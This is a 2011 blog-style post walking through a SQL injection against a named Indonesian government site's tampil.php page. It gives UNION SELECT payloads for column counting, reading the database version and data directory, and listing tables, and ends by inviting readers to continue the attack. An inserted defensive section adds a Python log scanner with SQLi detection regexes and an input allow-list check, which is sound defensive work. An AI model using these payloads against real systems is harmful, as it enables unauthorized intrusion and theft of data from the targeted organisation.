30 September 2011

SQLi on Deptan.go.id


Actually this is an old bug that still has not been patched! The only lucky thing is that the server runs with "safe mode : off", but remember.. nothing is secure :D There are many roads to Rome, though, so watch your system!

Vuln: http://www.deptan.go.id/tampil.php?page=kelembagaan&id=31
1=1 true ..
1=0 false ..

Code:

tampil.php?page=kelembagaan&id=31 order by 10-- false
tampil.php?page=kelembagaan&id=31 order by 9 -- true

Code:

tampil.php?page=kelembagaan&id=31 and 1=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,4,5,6,7,8,9-- result = 4

the version:
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,version(),5,6,7,8,9--

result: 5.0.45-standard-log

the user (the query shown actually reads @@datadir):
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,@@datadir,5,6,7,8,9-- result = /opt/coolstack/mysql_32bit/data/ /

Some info:
- version() = the version
- database() = the database
- user() = the user
- @@datadir = the data directory

Code:

tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,CHAR(97, 108, 100, 106, 97, 122, 97, 114, 97),5,6,7,8,9--

the tables:

tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--
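As an added defender's example that is not part of the original post: the probes above (ORDER BY column counting, UNION ALL SELECT with numbered columns, version()/@@datadir reads, information_schema.tables) leave recognisable traces in the web server's access log. The Python below scans constructed Apache-style log lines modelled on those requests, flags query values that carry such markers, and shows the allow-list check that tampil.php should have applied to id before it ever reached the query. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed Apache-style access-log lines (not real logs), modelled on the probes in the post.
SAMPLE_LOG = """
192.0.2.10 - - [30/Sep/2011:10:01:02 +0700] "GET /tampil.php?page=kelembagaan&id=31 HTTP/1.1" 200 5120
192.0.2.10 - - [30/Sep/2011:10:01:09 +0700] "GET /tampil.php?page=kelembagaan&id=31%20order%20by%2010-- HTTP/1.1" 200 310
192.0.2.10 - - [30/Sep/2011:10:01:15 +0700] "GET /tampil.php?page=kelembagaan&id=-31%20and%201=1%20union%20all%20select%201,2,3,version(),5,6,7,8,9-- HTTP/1.1" 200 5200
192.0.2.10 - - [30/Sep/2011:10:01:40 +0700] "GET /tampil.php?page=kelembagaan&id=-31%20and%201=1%20union%20all%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 6100
192.0.2.11 - - [30/Sep/2011:10:02:00 +0700] "GET /tampil.php?page=kelembagaan&id=32 HTTP/1.1" 200 5100
"""

# Common Log Format: client, identd, user, [timestamp], "request line", status, bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Markers of the UNION-based enumeration shown in the post, matched on the decoded, lowercased value.
RULES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema read", re.compile(r"\binformation_schema\.")),
    ("mysql metadata function", re.compile(r"\b(version|database|user)\(\)|@@\w+")),
    ("comment terminator", re.compile(r"(--|#)\s*$")),
]

def classify_value(value):
    """Return the names of the rules a single query-string value triggers."""
    decoded = unquote_plus(value).lower()  # second decode catches double-encoded probes
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Return (client_ip, url, parameter, rule_hits) for every request carrying SQLi markers."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        query = urlsplit(m.group("url")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append((m.group("ip"), m.group("url"), param, hits))
    return findings

def is_valid_record_id(value):
    """Allow-list check tampil.php should apply to id before it reaches the query: digits only."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

if __name__ == "__main__":
    for ip, url, param, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}= {', '.join(hits)}  <- {url[:60]}")
```

The same scan works on a real log file by reading it into `scan_log`; repeated hits from one client on a single parameter, as in the sample, are the signature of manual column enumeration.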


--------------------------------------------------------------


You can continue on your own, for certain reasons :)




